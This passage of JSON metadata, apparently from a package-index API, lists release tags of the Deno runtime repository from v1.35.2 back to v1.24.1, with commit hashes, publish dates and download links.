2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz